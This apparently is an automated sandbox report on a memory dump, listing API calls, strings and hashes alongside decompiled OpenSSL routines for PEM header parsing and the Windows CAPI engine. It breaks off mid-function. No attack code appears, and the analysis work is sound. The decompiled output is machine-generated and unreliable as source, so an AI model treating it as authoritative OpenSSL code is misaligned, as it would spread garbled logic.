0x6e586a34
0x6e586a43
0x6e5869bb
0x6e5869be
0x6e5869c3
0x6e5869d0
0x6e5869d8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e5869d8
0x6e5869b9

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6E5869AC
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 6E5869D0
GetLastError.KERNEL32 ref: 6E586A04
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000000), ref: 6E586A53
CryptGetProvParam.ADVAPI32(00000000,00000002,00000000,00000001,00000001), ref: 6E586A8E
GetLastError.KERNEL32 ref: 6E586AC2
CryptReleaseContext.ADVAPI32(?,00000000), ref: 6E586AF1
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6E586B7F
GetLastError.KERNEL32 ref: 6E586BD2
CryptReleaseContext.ADVAPI32(?,00000000), ref: 6E586C4C

Strings

Error code= 0x, xrefs: 6E586A1F, 6E586ADD, 6E586C1E
Listing containers CSP=%s, type = %d, xrefs: 6E586985
%lu. %s, xrefs: 6E586BAF
engines\e_capi.c, xrefs: 6E5869F2, 6E586A75, 6E586AB0, 6E586B1C, 6E586B4B, 6E586BFA, 6E586C39
Enumerate bug: using workaround, xrefs: 6E586BC2
%lX, xrefs: 6E586A0B, 6E586AC9, 6E586C0A
Got max container len %d, xrefs: 6E586AFF
Container name %s, len=%d, index=%d, flags=%d, xrefs: 6E586B92

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
String ID: %lX$%lu. %s$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Error code= 0x$Got max container len %d$Listing containers CSP=%s, type = %d$engines\e_capi.c
API String ID: 2639310310-806891013
Opcode ID: 32011b877adbb2c0f9b2c99eae6e63dd1295fa49e104e48a99bb8cf0a57cd4ec
Instruction ID: e0d410a0a831678544f2e85b2b10d087c44b4f546c0dc0047c01d97f7cf3b2f8
Opcode Fuzzy Hash: 32011b877adbb2c0f9b2c99eae6e63dd1295fa49e104e48a99bb8cf0a57cd4ec
Instruction Fuzzy Hash: 0081D074A60315BBEB00DFE5DC46FAF7BFCEB56B04F104429FA05AA281E7B199108761

Uniqueness

Uniqueness Score: -1.00%

Function 6E577920, Relevance: 26.6, APIs: 7, Strings: 8, Instructions: 374
COMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E6E577920(void* __ebx, signed int __ecx, signed char __edx, void* __edi, void* __ebp, signed int _a4, char _a8, signed int _a12, signed int _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr* _a40, signed int _a44, void* _a48, char _a52, char _a64, signed int _a68, intOrPtr* _a76, intOrPtr* _a80, signed int _a84, intOrPtr _a88, signed int _a92, intOrPtr _a96, intOrPtr _a100, signed int _a104) {
				char _v0;
				void* __esi;
				signed int _t69;
				signed int _t79;
				void* _t87;
				signed int _t88;
				void* _t93;
				signed int _t96;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				signed int _t120;
				void* _t122;
				signed int _t123;
				void* _t124;
				signed int _t125;
				unsigned int _t130;
				signed int _t138;
				intOrPtr _t141;
				char _t144;
				signed int _t155;
				signed char _t156;
				char* _t158;
				signed int _t160;
				void* _t163;
				char* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				char* _t172;
				intOrPtr* _t173;
				signed int _t175;
				void* _t176;
				signed int _t177;
				void* _t178;
				void* _t179;
				char* _t181;
				signed int _t182;
				intOrPtr _t184;
				signed int _t188;
				void* _t189;
				signed int _t190;
				void* _t192;
				signed int _t193;
				void* _t197;

				_t156 = __edx;
				_t145 = __ecx;
				E6E52F9A0();
				_t69 =  *0x6e688c24; // 0x8e9367b0
				_a68 = _t69 ^ _t188;
				_a36 = _a76;
				_a40 = _a80;
				_a44 = _a84;
				_a24 = _a88;
				_push(__ebx);
				_a16 = _a92;
				_t138 = 0;
				_push(__ebp);
				_a32 = _a96;
				_t184 = 0;
				_a28 = _a100;
				_t175 = 0;
				_push(__edi);
				_t158 = 0;
				_a20 = 0;
				_t79 = _a104 & 0x00000001;
				_a4 = 0;
				_v0 = 0;
				_a8 = 0;
				_a12 = _t79;
				L1:
				L1:
				if(_t79 == 0) {
					_push(0xdf);
					_push("crypto\\pem\\pem_lib.c");
					E6E55C7C0(_t184);
					_push(0xdf);
					_push("crypto\\pem\\pem_lib.c");
					E6E55C7C0(_t175);
					_push(0xdf);
					_push("crypto\\pem\\pem_lib.c");
					E6E55C7C0(_t158);
					_t189 = _t188 + 0x24;
				} else {
					E6E561670(_t156, _t184, 0, "crypto\\pem\\pem_lib.c", 0xdd);
					E6E561670(_t156, _t175, 0, "crypto\\pem\\pem_lib.c", 0xdd);
					E6E561670(_t156, _t158, _t138, "crypto\\pem\\pem_lib.c", 0xdd);
					_t189 = _t188 + 0x30;
				}
				_push(_a104);
				_push( &_a8);
				_push( &_v0);
				_push( &_a4);
				_push( &_a20);
				_push(_a16);
				_t87 = E6E576AC0(_t138, _t145, _t156);
				_t190 = _t189 + 0x18;
				if(_t87 == 0) {
					goto L53;
				}
				_t184 = _a20;
				_t93 = E6E576FF0(_t138, _t184, _t184, _a24);
				_t188 = _t190 + 8;
				if(_t93 != 0) {
					_t140 = _a4;
					asm("xorps xmm0, xmm0");
					_a64 = 0;
					asm("movups [esp+0x40], xmm0");
					__eflags = _t140;
					if(_t140 == 0) {
						L40:
						_push(_a28);
						_t141 = _v0;
						_push(_a32);
						_push( &_a8);
						_push(_t141);
						_push( &_a48);
						_t96 = E6E5765B0(_t141, _t158, _t175, _t184);
						_t192 = _t188 + 0x14;
						__eflags = _t96;
						if(_t96 == 0) {
							goto L15;
						} else {
							_t160 = 1;
							 *_a36 = _t141;
							 *_a40 = _a8;
							_t109 = _a44;
							__eflags = _t109;
							if(_t109 == 0) {
								goto L16;
							} else {
								_t177 = _a12;
								 *_t109 = _t184;
								__eflags = _t177;
								if(_t177 == 0) {
									goto L47;
								} else {
									goto L18;
								}
							}
						}
					} else {
						_t110 =  *_t140;
						__eflags = _t110;
						if(_t110 == 0) {
							goto L40;
						} else {
							__eflags = _t110 - 0xa;
							if(_t110 == 0xa) {
								goto L40;
							} else {
								_t111 = E6E537D20(_t140, "Proc-Type:", 0xa);
								_t197 = _t188 + 0xc;
								__eflags = _t111;
								if(__eflags == 0) {
									_t163 = _t140 + 0xa;
									_t164 = _t163 + E6E613040(_t145, _t163, " \t");
									_t192 = _t197 + 8;
									__eflags =  *_t164 - 0x34;
									if( *_t164 != 0x34) {
										goto L14;
									} else {
										_t165 = _t164 + 2;
										__eflags =  *((intOrPtr*)(_t164 + 1)) - 0x2c;
										if( *((intOrPtr*)(_t164 + 1)) != 0x2c) {
											goto L14;
										} else {
											_t166 = _t165 + E6E613040(_t145, _t165, " \t");
											_t115 = E6E537D20(_t166, "ENCRYPTED", 9);
											_t197 = _t192 + 0x14;
											__eflags = _t115;
											if(__eflags != 0) {
												L45:
												_push(0x1fd);
												_push("crypto\\pem\\pem_lib.c");
												_push(0x6a);
												goto L12;
											} else {
												_t167 = _t166 + 9;
												_t117 = E6E613040(_t145, _t167, " \t\r\n");
												_t197 = _t197 + 8;
												__eflags = _t117;
												if(__eflags == 0) {
													goto L45;
												} else {
													_t168 = _t167 + E6E613040(_t145, _t167, " \t\r");
													_t197 = _t197 + 8;
													_t169 = _t168 + 1;
													__eflags =  *_t168 - 0xa;
													if(__eflags == 0) {
														_t120 = E6E537D20(_t169, "DEK-Info:", 9);
														_t197 = _t197 + 0xc;
														__eflags = _t120;
														if(__eflags == 0) {
															_t170 = _t169 + 9;
															_t171 = _t170 + E6E613040(_t145, _t170, " \t");
															_t122 = E6E537870(_t145, _t171, " \t,");
															_t144 =  *((intOrPtr*)(_t171 + _t122));
															_t172 = _t171 + _t122;
															 *_t172 = 0;
															_t123 = E6E55BF50(_t144, _t156, _t172, _t171, _t184, _t171);
															_a48 = _t123;
															_a16 = _t123;
															 *_t172 = _t144;
															_t124 = E6E613040(_t145, _t172, " \t");
															_t140 = _a16;
															_t173 = _t172 + _t124;
															_t197 = _t197 + 0x1c;
															_t181 = _t173;
															__eflags = _a16;
															if(__eflags != 0) {
																_t125 = E6E4F93B0(_t140);
																_t197 = _t197 + 4;
																__eflags = _t125;
																if(_t125 <= 0) {
																	_t158 = _t181;
																	__eflags = _t125;
																	if(_t125 != 0) {
																		goto L35;
																	} else {
																		__eflags =  *_t181 - 0x2c;
																		if(__eflags != 0) {
																			goto L35;
																		} else {
																			_push(0x227);
																			_push("crypto\\pem\\pem_lib.c");
																			_push(0x82);
																			goto L12;
																		}
																	}
																} else {
																	_t158 = _t173 + 1;
																	__eflags =  *_t173 - 0x2c;
																	if(__eflags == 0) {
																		L35:
																		_t182 = E6E4F93B0(_t140);
																		_t188 = _t197 + 4;
																		__eflags = _t182;
																		if(_t182 > 0) {
																			E6E531060(_t158,  &_a52, 0, _t182);
																			_t188 = _t188 + 0xc;
																		}
																		_t140 = _t182 + _t182;
																		_t175 = 0;
																		__eflags = _t140;
																		if(_t140 <= 0) {
																			goto L40;
																		} else {
																			while(1) {
																				_t156 = E6E561360( *(_t175 + _t158) & 0x000000ff);
																				_t197 = _t188 + 4;
																				__eflags = _t156;
																				if(__eflags < 0) {
																					break;
																				}
																				_t130 = _t175 >> 1;
																				_t155 =  !_t175 & 0x00000001;
																				_t175 = _t175 + 1;
																				_t145 = _t155 << 2;
																				 *(_t197 + _t130 + 0x44) =  *(_t197 + _t130 + 0x44) | _t156;
																				__eflags = _t175 - _t140;
																				if(_t175 < _t140) {
																					continue;
																				} else {
																					goto L40;
																				}
																				goto L48;
																			}
																			_push(0x23d);
																			_push("crypto\\pem\\pem_lib.c");
																			_push(0x67);
																			_push(0x65);
																			goto L13;
																		}
																	} else {
																		_push(0x224);
																		_push("crypto\\pem\\pem_lib.c");
																		_push(0x81);
																		goto L12;
																	}
																}
															} else {
																_push(0x21f);
																_push("crypto\\pem\\pem_lib.c");
																_push(0x72);
																goto L12;
															}
														} else {
															_push(0x20c);
															_push("crypto\\pem\\pem_lib.c");
															_push(0x69);
															goto L12;
														}
													} else {
														_push(0x203);
														_push("crypto\\pem\\pem_lib.c");
														_push(0x70);
														goto L12;
													}
												}
											}
										}
									}
								} else {
									_push(0x1f0);
									_push("crypto\\pem\\pem_lib.c");
									_push(0x6b);
									L12:
									_push(0x6b);
									L13:
									_push(9);
									E6E552F50(_t140, _t145, _t184, __eflags);
									_t192 = _t197 + 0x14;
									L14:
									_t141 = _v0;
									L15:
									_t160 = 0;
									__eflags = 0;
									L16:
									_t177 = _a12;
									__eflags = _t177;
									if(_t177 == 0) {
										_push(0xdf);
										_push("crypto\\pem\\pem_lib.c");
										E6E55C7C0(_t184);
										_t192 = _t192 + 0xc;
										L47:
										_push(0xdf);
										_push("crypto\\pem\\pem_lib.c");
										E6E55C7C0(_a4);
										_t193 = _t192 + 0xc;
									} else {
										E6E561670(_t156, _t184, 0, "crypto\\pem\\pem_lib.c", 0xdd);
										_t192 = _t192 + 0x10;
										L18:
										E6E561670(_t156, _a4, 0, "crypto\\pem\\pem_lib.c", 0xdd);
										_t193 = _t192 + 0x10;
									}
								}
							}
						}
					}
					L48:
					__eflags = _t160;
					if(_t160 != 0) {
						L52:
						_pop(_t178);
						__eflags = _a68 ^ _t193;
						return E6E52F227(_a68 ^ _t193, _t178);
					} else {
						__eflags = _t177;
						if(_t177 == 0) {
							_push(0xdf);
							_push("crypto\\pem\\pem_lib.c");
							E6E55C7C0(_t141);
							_t193 = _t193 + 0xc;
							goto L52;
						} else {
							E6E561670(_t156, _t141, _a8, "crypto\\pem\\pem_lib.c", 0xdd);
							_pop(_t179);
							__eflags = _a68 ^ _t193 + 0x00000010;
							return E6E52F227(_a68 ^ _t193 + 0x00000010, _t179);
						}
					}
				} else {
					_t175 = _a4;
					_t158 = _v0;
					_t138 = _a8;
					_t79 = _a12;
					goto L1;
				}
				L56:
				L53:
				_t88 = E6E552E20();
				__eflags = (_t88 & 0x00000fff) - 0x6c;
				if((_t88 & 0x00000fff) == 0x6c) {
					_push(_a24);
					_push("Expecting: ");
					_push(2);
					E6E5525B0();
					_t190 = _t190 + 0xc;
				}
				_pop(_t176);
				__eflags = _a68 ^ _t190;
				return E6E52F227(_a68 ^ _t190, _t176);
				goto L56;
			}

0x6e577920
0x6e577920
0x6e577925
0x6e57792a
0x6e577931
0x6e577939
0x6e577941
0x6e577949
0x6e577951
0x6e577959
0x6e57795a
0x6e57795e
0x6e577964
0x6e577965
0x6e577969
0x6e577970
0x6e577974
0x6e57797a
0x6e57797b
0x6e57797d
0x6e577981
0x6e577984
0x6e577988
0x6e57798c
0x6e577990
0x00000000
0x6e577994
0x6e577996
0x6e5779d2
0x6e5779d7
0x6e5779dd
0x6e5779e2
0x6e5779e7
0x6e5779ed
0x6e5779f2
0x6e5779f7
0x6e5779fd
0x6e577a02
0x6e577998
0x6e5779a5
0x6e5779b7
0x6e5779c8
0x6e5779cd
0x6e5779cd
0x6e577a05
0x6e577a0d
0x6e577a12
0x6e577a17
0x6e577a1c
0x6e577a1d
0x6e577a21
0x6e577a26
0x6e577a2b
0x00000000
0x00000000
0x6e577a35
0x6e577a3a
0x6e577a3f
0x6e577a44
0x6e577a5b
0x6e577a5f
0x6e577a62
0x6e577a6a
0x6e577a6f
0x6e577a71
0x6e577ca1
0x6e577ca1
0x6e577ca5
0x6e577cad
0x6e577cb1
0x6e577cb6
0x6e577cb7
0x6e577cb8
0x6e577cbd
0x6e577cc0
0x6e577cc2
0x00000000
0x6e577cc8
0x6e577ccc
0x6e577cd5
0x6e577cdb
0x6e577cdd
0x6e577ce1
0x6e577ce3
0x00000000
0x6e577ce9
0x6e577ce9
0x6e577ced
0x6e577cef
0x6e577cf1
0x00000000
0x6e577cf3
0x00000000
0x6e577cf3
0x6e577cf1
0x6e577ce3
0x6e577a77
0x6e577a77
0x6e577a79
0x6e577a7b
0x00000000
0x6e577a81
0x6e577a81
0x6e577a83
0x00000000
0x6e577a89
0x6e577a91
0x6e577a96
0x6e577a99
0x6e577a9b
0x6e577af9
0x6e577b07
0x6e577b09
0x6e577b0c
0x6e577b0f
0x00000000
0x6e577b11
0x6e577b14
0x6e577b17
0x6e577b19
0x00000000
0x6e577b1b
0x6e577b28
0x6e577b30
0x6e577b35
0x6e577b38
0x6e577b3a
0x6e577d0b
0x6e577d0b
0x6e577d10
0x6e577d15
0x00000000
0x6e577b40
0x6e577b40
0x6e577b49
0x6e577b4e
0x6e577b51
0x6e577b53
0x00000000
0x6e577b59
0x6e577b64
0x6e577b66
0x6e577b6b
0x6e577b6c
0x6e577b6e
0x6e577b89
0x6e577b8e
0x6e577b91
0x6e577b93
0x6e577ba6
0x6e577bb4
0x6e577bbe
0x6e577bc3
0x6e577bc6
0x6e577bc9
0x6e577bcc
0x6e577bd6
0x6e577bdb
0x6e577bdf
0x6e577be1
0x6e577be6
0x6e577bea
0x6e577bec
0x6e577bef
0x6e577bf1
0x6e577bf3
0x6e577c07
0x6e577c0c
0x6e577c0f
0x6e577c11
0x6e577c2e
0x6e577c30
0x6e577c32
0x00000000
0x6e577c34
0x6e577c34
0x6e577c37
0x00000000
0x6e577c39
0x6e577c39
0x6e577c3e
0x6e577c43
0x00000000
0x6e577c43
0x6e577c37
0x6e577c13
0x6e577c15
0x6e577c16
0x6e577c18
0x6e577c4d
0x6e577c53
0x6e577c55
0x6e577c58
0x6e577c5a
0x6e577c64
0x6e577c69
0x6e577c69
0x6e577c6c
0x6e577c6f
0x6e577c71
0x6e577c73
0x00000000
0x6e577c75
0x6e577c75
0x6e577c7f
0x6e577c81
0x6e577c84
0x6e577c86
0x00000000
0x00000000
0x6e577c8e
0x6e577c90
0x6e577c93
0x6e577c94
0x6e577c99
0x6e577c9d
0x6e577c9f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e577c9f
0x6e577cf8
0x6e577cfd
0x6e577d02
0x6e577d04
0x00000000
0x6e577d04
0x6e577c1a
0x6e577c1a
0x6e577c1f
0x6e577c24
0x00000000
0x6e577c24
0x6e577c18
0x6e577bf5
0x6e577bf5
0x6e577bfa
0x6e577bff
0x00000000
0x6e577bff
0x6e577b95
0x6e577b95
0x6e577b9a
0x6e577b9f
0x00000000
0x6e577b9f
0x6e577b70
0x6e577b70
0x6e577b75
0x6e577b7a
0x00000000
0x6e577b7a
0x6e577b6e
0x6e577b53
0x6e577b3a
0x6e577b19
0x6e577a9d
0x6e577a9d
0x6e577aa2
0x6e577aa7
0x6e577aa9
0x6e577aa9
0x6e577aab
0x6e577aab
0x6e577aad
0x6e577ab2
0x6e577ab5
0x6e577ab5
0x6e577ab9
0x6e577ab9
0x6e577ab9
0x6e577abb
0x6e577abb
0x6e577abf
0x6e577ac1
0x6e577d1c
0x6e577d21
0x6e577d27
0x6e577d2c
0x6e577d2f
0x6e577d2f
0x6e577d34
0x6e577d3d
0x6e577d42
0x6e577ac7
0x6e577ad4
0x6e577ad9
0x6e577adc
0x6e577aec
0x6e577af1
0x6e577af1
0x6e577ac1
0x6e577a9b
0x6e577a83
0x6e577a7b
0x6e577d45
0x6e577d45
0x6e577d47
0x6e577d8c
0x6e577d8f
0x6e577d96
0x6e577da0
0x6e577d49
0x6e577d49
0x6e577d4b
0x6e577d79
0x6e577d7e
0x6e577d84
0x6e577d89
0x00000000
0x6e577d4d
0x6e577d5c
0x6e577d67
0x6e577d6e
0x6e577d78
0x6e577d78
0x6e577d4b
0x6e577a46
0x6e577a46
0x6e577a4a
0x6e577a4e
0x6e577a52
0x00000000
0x6e577a52
0x00000000
0x6e577da1
0x6e577da1
0x6e577dab
0x6e577dae
0x6e577db0
0x6e577db4
0x6e577db9
0x6e577dbb
0x6e577dc0
0x6e577dc0
0x6e577dca
0x6e577dcd
0x6e577dd7
0x00000000

APIs

_strspn.LIBCMT ref: 6E577B02
_strspn.LIBCMT ref: 6E577B21
_strspn.LIBCMT ref: 6E577B49
_strspn.LIBCMT ref: 6E577B5F
_strspn.LIBCMT ref: 6E577BAF
_strcspn.LIBCMT ref: 6E577BBE
_strspn.LIBCMT ref: 6E577BE1

Strings

, xrefs: 6E577B43
Expecting: , xrefs: 6E577DB4
crypto\pem\pem_lib.c, xrefs: 6E57799D, 6E5779AF, 6E5779C1, 6E5779D7, 6E5779E7, 6E5779F7, 6E577AA2, 6E577ACC, 6E577AE1, 6E577B75, 6E577B9A, 6E577BFA, 6E577C1F, 6E577C3E, 6E577CFD, 6E577D10, 6E577D21, 6E577D34, 6E577D52, 6E577D7E
DEK-Info:, xrefs: 6E577B83
Proc-Type:, xrefs: 6E577A8B
,, xrefs: 6E577BB6
, xrefs: 6E577B59
ENCRYPTED, xrefs: 6E577B2A

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _strspn$_strcspn
String ID: $ $ ,$DEK-Info:$ENCRYPTED$Expecting: $Proc-Type:$crypto\pem\pem_lib.c
API String ID: 2444307261-2737264525
Opcode ID: 45207e89d7c892114f095d3f1b0fc537d5227da64d24b82da1494c7d98b54c51
Instruction ID: 903bc746ece5f4d79702136eaad7a357fa5a28c5a2bbc2172a5f1efecd1eebc7
Opcode Fuzzy Hash: 45207e89d7c892114f095d3f1b0fc537d5227da64d24b82da1494c7d98b54c51
Instruction Fuzzy Hash: DBC12A71648301ABE7109EE4EC41F6FBBECEFC5705F044819FA94AA3C2E771D91546A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E585B30, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E6E585B30(void* __ebx, void* __edi, void* __ebp, void* __fp0, intOrPtr _a4, signed int _a20, int _a24, unsigned int _a28, intOrPtr _a32, char* _a36, intOrPtr _a40) {
				char* _v0;
				signed int _v12;
				void* __esi;
				signed int _t27;
				signed int _t34;
				signed int _t35;
				void* _t50;
				void* _t51;
				signed int _t55;
				signed int _t56;
				int* _t58;
				char* _t61;
				void* _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				int _t71;
				void* _t76;
				long** _t77;
				void* _t78;
				unsigned int _t81;
				signed int _t84;
				signed int _t85;
				void* _t88;
				void* _t104;

				_t104 = __fp0;
				E6E52F9A0();
				_t27 =  *0x6e688c24; // 0x8e9367b0
				_a20 = _t27 ^ _t84;
				_t81 = _a28;
				_t75 = _a36;
				_t69 = _a32;
				_push(0x5cb);
				_push("engines\\e_capi.c");
				_a4 = _t69;
				_v0 = _t75;
				_t58 = E6E55C790(0x10);
				_t85 = _t84 + 0xc;
				if(_t58 == 0) {
					L25:
					_pop(_t76);
					return E6E52F227(_a20 ^ _t85, _t76);
				} else {
					if(_a40 == 1 &&  *0x6e68e3a8 != 0) {
						_t61 = L"Microsoft Enhanced Cryptographic Provider v1.0";
						_t55 = _t75;
						while(1) {
							_t66 =  *_t55;
							if(_t66 !=  *_t61) {
								break;
							}
							if(_t66 == 0) {
								L8:
								_t56 = 0;
							} else {
								_t67 =  *((intOrPtr*)(_t55 + 2));
								if(_t67 != _t61[2]) {
									break;
								} else {
									_t55 = _t55 + 4;
									_t61 =  &(_t61[4]);
									if(_t67 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t56 == 0) {
								_t75 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
								_a40 = 0x18;
								_v0 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
							}
							goto L12;
						}
						asm("sbb eax, eax");
						_t56 = _t55 | 0x00000001;
						__eflags = _t56;
						goto L10;
					}
					L12:
					if(_t81 != 0 && _v0 >= 2 && _a4 != 0) {
						_t50 = E6E587B00(_t69);
						_t51 = E6E587B00(_t75);
						_push(_a40);
						_push(_t51);
						E6E584870(_t58, _t81, _t104, _t81, "capi_get_key, contname=%s, provname=%s, type=%d\n", _t50);
						_push(0x5df);
						_push("engines\\e_capi.c");
						E6E55C7C0(_t51);
						_push(0x5e0);
						_push("engines\\e_capi.c");
						E6E55C7C0(_t50);
						_t69 = _a4;
						_t85 = _t85 + 0x34;
					}
					_t16 =  &(_t58[1]); // 0x4
					_t77 = _t16;
					_t34 = _a28 >> 0x0000000c & 0x00000020;
					__imp__CryptAcquireContextW(_t77, _t69, _v0, _a40, _t34);
					if(_t34 != 0) {
						_t71 = _a24;
						_t35 =  &(_t58[2]);
						__imp__CryptGetUserKey( *_t77, _t71, _t35);
						__eflags = _t35;
						if(_t35 != 0) {
							_t58[3] = _t71;
							_pop(_t78);
							 *_t58 = 0;
							__eflags = _v12 ^ _t85;
							return E6E52F227(_v12 ^ _t85, _t78);
						} else {
							_t38 =  *0x6e68e398;
							__eflags =  *0x6e68e398;
							if(__eflags == 0) {
								 *0x6e68e398 = E6E552AE0(_t61);
							}
							E6E552F50(_t58, _t61, _t81, __eflags, _t38, 0x67, 0x75, "engines\\e_capi.c", 0x5eb);
							_t88 = _t85 + 0x14;
							E6E584970(_t77, __eflags);
							CryptReleaseContext( *_t77, 0);
							goto L24;
						}
					} else {
						_t43 =  *0x6e68e398;
						_t102 = _t43;
						if(_t43 == 0) {
							 *0x6e68e398 = E6E552AE0(_t61);
						}
						E6E552F50(_t58, _t61, _t81, _t102, _t43, 0x67, 0x68, "engines\\e_capi.c", 0x5e6);
						_push(GetLastError());
						_push("%lX");
						_push(0xa);
						_push( &_v12);
						E6E55CB70(_t102);
						_push( &_v12);
						_push("Error code= 0x");
						_push(2);
						E6E5525B0();
						_t88 = _t85 + 0x30;
						L24:
						_push(0x5f5);
						_push("engines\\e_capi.c");
						E6E55C7C0(_t58);
						_t85 = _t88 + 0xc;
						goto L25;
					}
				}
			}

0x6e585b30
0x6e585b35
0x6e585b3a
0x6e585b41
0x6e585b47
0x6e585b4c
0x6e585b51
0x6e585b55
0x6e585b5a
0x6e585b61
0x6e585b65
0x6e585b6e
0x6e585b70
0x6e585b75
0x6e585d04
0x6e585d05
0x6e585d18
0x6e585b7b
0x6e585b80
0x6e585b8b
0x6e585b90
0x6e585b92
0x6e585b92
0x6e585b98
0x00000000
0x00000000
0x6e585b9d
0x6e585bb4
0x6e585bb4
0x6e585b9f
0x6e585b9f
0x6e585ba7
0x00000000
0x6e585ba9
0x6e585ba9
0x6e585bac
0x6e585bb2
0x00000000
0x00000000
0x00000000
0x00000000
0x6e585bb2
0x6e585ba7
0x6e585bbd
0x6e585bbf
0x6e585bc1
0x6e585bc6
0x6e585bce
0x6e585bce
0x00000000
0x6e585bbf
0x6e585bb8
0x6e585bba
0x6e585bba
0x00000000
0x6e585bba
0x6e585bd2
0x6e585bd4
0x6e585be3
0x6e585beb
0x6e585bf0
0x6e585bf6
0x6e585bfe
0x6e585c03
0x6e585c08
0x6e585c0e
0x6e585c13
0x6e585c18
0x6e585c1e
0x6e585c23
0x6e585c27
0x6e585c27
0x6e585c2d
0x6e585c2d
0x6e585c33
0x6e585c41
0x6e585c49
0x6e585ca3
0x6e585ca7
0x6e585cae
0x6e585cb4
0x6e585cb6
0x6e585d1f
0x6e585d23
0x6e585d25
0x6e585d2c
0x6e585d36
0x6e585cb8
0x6e585cb8
0x6e585cbd
0x6e585cbf
0x6e585cc6
0x6e585cc6
0x6e585cda
0x6e585cdf
0x6e585ce2
0x6e585ceb
0x00000000
0x6e585ceb
0x6e585c4b
0x6e585c4b
0x6e585c50
0x6e585c52
0x6e585c59
0x6e585c59
0x6e585c6d
0x6e585c7b
0x6e585c7c
0x6e585c85
0x6e585c87
0x6e585c88
0x6e585c91
0x6e585c92
0x6e585c97
0x6e585c99
0x6e585c9e
0x6e585cf1
0x6e585cf1
0x6e585cf6
0x6e585cfc
0x6e585d01
0x00000000
0x6e585d01
0x6e585c49

APIs

CryptAcquireContextW.ADVAPI32(00000004,?,?,?,?), ref: 6E585C41
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6E585C75
CryptGetUserKey.ADVAPI32(00000004,?,00000000), ref: 6E585CAE
CryptReleaseContext.ADVAPI32(00000004,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6E585CEB

Strings

Error code= 0x, xrefs: 6E585C92
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 6E585BC1, 6E585BE8
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 6E585B8B
engines\e_capi.c, xrefs: 6E585B5A, 6E585C08, 6E585C18, 6E585C63, 6E585CD0, 6E585CF6
%lX, xrefs: 6E585C7C
capi_get_key, contname=%s, provname=%s, type=%d, xrefs: 6E585BF8

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Context$AcquireErrorLastReleaseUser
String ID: %lX$Error code= 0x$Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced RSA and AES Cryptographic Provider$capi_get_key, contname=%s, provname=%s, type=%d$engines\e_capi.c
API String ID: 3552203178-3432848613
Opcode ID: fc793c8c93774ca51844cc8fa65cbc2e8ead7ec9f8d0516169ce85335d021e56
Instruction ID: 85d43f4d621e9e9b3bde1c7b201b993f77b26f0a280e4df73e98afa01ce531fb
Opcode Fuzzy Hash: fc793c8c93774ca51844cc8fa65cbc2e8ead7ec9f8d0516169ce85335d021e56
Instruction Fuzzy Hash: 92511935614311ABE701AFE4DC41FAB77E8AFA5B09F40482DF606AF380E765D910CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E584EA0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E584EA0(void* __ebx, void* __ecx, void* __edi, void* __fp0, intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v20;
				int _v24;
				short* _v28;
				long* _v32;
				void* _v44;
				void* __esi;
				void* __ebp;
				signed int _t24;
				int _t35;
				short* _t46;
				short* _t48;
				long** _t49;
				intOrPtr _t52;
				void* _t56;
				intOrPtr _t64;
				char* _t69;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				void* _t73;
